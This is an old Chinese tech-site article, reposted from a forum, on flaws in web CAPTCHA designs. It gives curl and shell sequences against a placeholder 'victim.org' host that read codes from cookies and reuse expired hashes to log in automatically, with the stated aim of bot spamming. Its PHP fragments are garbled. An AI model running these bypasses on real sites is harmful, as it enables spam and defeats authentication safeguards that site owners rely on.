科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道实例讲解网络验证码的破解

实例讲解网络验证码的破解

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息

作者:论坛整理 来源:zdnet网络安全 2008年1月2日

关键字: 安全管理 破解 身份验证 网络验证

  • 评论
  • 分享微博
  • 分享邮件
 所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息,

  输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。

  很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。

  验证码在网页中的例子:

  //验证用户输入是否和验证码一致

  if(isset($HTTP_POST_VARS[’authinput’

  if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’

  echo "验证成功!

  echo "验证失败!

  //生成新的四位整数验证码

  请输入验证码:

  
  print("校验码不正确

  第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。

  curl http://www.vicitm.org/index.php -c common_cookie # 接受服务器的初始

  curl http://www.vicitm.org/get_code.php -c $username.cook -b common_cookie # 得到验证码,从cookies中

  curl http://www.victim.org/login.php -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用

  cookies中的验证码登陆

  更高级的验证码。(好像本论坛的就是这种。。。。)

  有一类验证码比以上两种验证码要高级一些,它使用如下算法:

  1。服务器生成一个随机hash。

  2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。

  3。hash在cookie中被发送到客户端

  3。客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。

  特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。

  对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。

  如

  先从服务器上下载一张验证码图片:

  人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。

  机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破

  curl http://www.victim.org/index.php -c $username.cookie # 得到初始化cookies,以及

  grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的

  echo "www.victim.org FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码

  authnum=$num # 使用过期验证码登陆。

  #登陆成功,去疯狂灌水。。。。。。

  最高级的验证码。

  它使用如下方法:

  1。服务器通过用户相关信息(IP,SID等等)生成一个随机hash。

  2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。

  3。hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以

  是session id)

  4。seq被作为cookies发送给客户端。

  5。客户以图片输入验证码。

  5。服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。

  6。一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。

  特点:

  ×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。

  ×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。

  弱点:OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证)对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。

  curl [url]/news/UploadFiles_9994/200712/20071219180453716.png -c validcode_cookie # 得到验证码图片,和对应seq。

  echo -n 请输入validate.png中的验证码:

  read valid_number # 输入验证码

  # 登陆,并进行某种自动化操作,如疯狂灌水。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章